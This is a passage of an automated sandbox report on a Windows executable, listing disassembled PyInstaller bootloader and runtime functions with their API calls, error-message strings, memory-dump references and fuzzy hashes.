                                                                                                                                                                                                                                      Function 00007FF70AEF2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2C9E
                                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF70AEF3706,?,00007FF70AEF3804), ref: 00007FF70AEF2D63
                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF70AEF2D99
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$CurrentFormatProcess
                                                                                                                                                                                                                                      • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                                                                                                      • API String ID: 3940978338-251083826
                                                                                                                                                                                                                                      • Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                      • Instruction ID: 12dc2291aee8245a9d18ffdee8ed57ec0f5cef330ac0c4d765d1565b486e1053
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631B323B08A4142F620BB25EC156EAA695FF88798FC14135EF4D93759DF3CE506C710
                                                                                                                                                                                                                                      Function 00007FF70AEFDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDBD
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDCB
                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDDF5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDE63
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF70AEFDFEA,?,?,?,00007FF70AEFDCDC,?,?,?,00007FF70AEFD8D9), ref: 00007FF70AEFDE6F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                      • Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                      • Instruction ID: cc66b3c5d4467c0075645944493140a5e6dad2682cf7b121df0e3f9a2f4c1bff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88318B22F1A64281FE22BB02EC41565A794FF58BA4FC94675ED1D46388EF3CE4448224
                                                                                                                                                                                                                                      Function 00007FF70AEF6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                      • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                      • Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                      • Instruction ID: 88587a5671963cb955d4971628a23e56fb313766598f750cfac131ffd9d38267
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC413E23A1868791FA15FB21E8562EAA361FF54384FD00172EA5D436D6EF3CF606C760
                                                                                                                                                                                                                                      Function 00007FF70AEF2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF70AEF351A,?,00000000,00007FF70AEF3F23), ref: 00007FF70AEF2AA0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                      • API String ID: 2050909247-2900015858
                                                                                                                                                                                                                                      • Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                      • Instruction ID: 8cdc0f49be2dd7766074a35e68569faeaed3c6dc878683c2af4b61d902c2d542
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A217F33A18B8282F620EB51F8417E6A394FF88784F800176EE8C53759DF3CE6468750
                                                                                                                                                                                                                                      Function 00007FF70AF0B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                      • Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                      • Instruction ID: 332f2f7501106a782f7626f4e827d6e97407edf2c114301820b3b1ab2a20fe71
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E4214C22F0D24685FA69B761DE5193DE2425F447E0F9447B4D93E86AD6DF2CF8418320
                                                                                                                                                                                                                                      Function 00007FF70AF17DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                      • Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                      • Instruction ID: aebd536bef85ee6787254642d746a649452eb8ffc433648ac6e1b80d8c92bece
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C7119D22B18A4186F350AB52EC54329E6A0FF88BF4F904274EA5D877A4DF7CE804CB50
                                                                                                                                                                                                                                      Function 00007FF70AEF8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF8592
                                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF85E9
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF70AEF45E4,00000000,00007FF70AEF1985), ref: 00007FF70AEF9439
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF8678
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF86E4
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF86F5
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF70AEF9216), ref: 00007FF70AEF870A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3462794448-0
                                                                                                                                                                                                                                      • Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                      • Instruction ID: f7ba80ca8781e62366874c789aedbf9145c96c5a1d33406980dc604efaa5add8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8F415C63B1968781FA20BB12ED416AAA394FF84BC4FC50175DE8D97B89DF3CE5058720
                                                                                                                                                                                                                                      Function 00007FF70AF0B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B347
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B37D
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3AA
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3BB
                                                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3CC
                                                                                                                                                                                                                                      • SetLastError.KERNEL32(?,?,?,00007FF70AF04F81,?,?,?,?,00007FF70AF0A4FA,?,?,?,?,00007FF70AF071FF), ref: 00007FF70AF0B3E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Value$ErrorLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2506987500-0
                                                                                                                                                                                                                                      • Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                      • Instruction ID: 1ff7f6feb3d3f40b8a80747166ce22bd4b0b88237d7025c5fa124f384b9a09e9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2112E22B0D64282FA68B761DE5193DE1429F487B0FE447B4E97E867D6DF2CF4018321
                                                                                                                                                                                                                                      Function 00007FF70AEF2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF70AEF1B6A), ref: 00007FF70AEF295E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                                                                                                      • API String ID: 2050909247-2962405886
                                                                                                                                                                                                                                      • Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                      • Instruction ID: 194f62f0b776a1e1085f08ae78625cb99e0488608ee2db1e943f145d75b4d112
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131D323B1868692F720B761EC416E6A294BF887D4FC14172EE8D83795EF3CE5468710
                                                                                                                                                                                                                                      Function 00007FF70AEF2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                                                                                                      • String ID: Unhandled exception in script
                                                                                                                                                                                                                                      • API String ID: 3081866767-2699770090
                                                                                                                                                                                                                                      • Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                      • Instruction ID: 22c78a12bc30a8906687766600572ab6426f8270504b2ba1bbcf261f7f72a8d2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE311C63619A8289FB20FF61EC556F9A360FF88784F940175EA4D87B59DF3CE1058720
                                                                                                                                                                                                                                      Function 00007FF70AEF2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF70AEF918F,?,00007FF70AEF3C55), ref: 00007FF70AEF2BA0
                                                                                                                                                                                                                                      • MessageBoxW.USER32 ref: 00007FF70AEF2C2A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentMessageProcess
                                                                                                                                                                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                                                                                                      • API String ID: 1672936522-3797743490
                                                                                                                                                                                                                                      • Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                      • Instruction ID: 9ced47fdc60e486b87ab5ed360c8b5c69843c99d26ab19b72c2ce5bde0344bde
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0219F63708B4182F620EB14F8457EAB3A4EF88784F804136EA8D97755DF3CE605C710
                                                                                                                                                                                                                                      Function 00007FF70AEF2710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF70AEF1B99), ref: 00007FF70AEF2760
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                                                                                                      • API String ID: 2050909247-1591803126
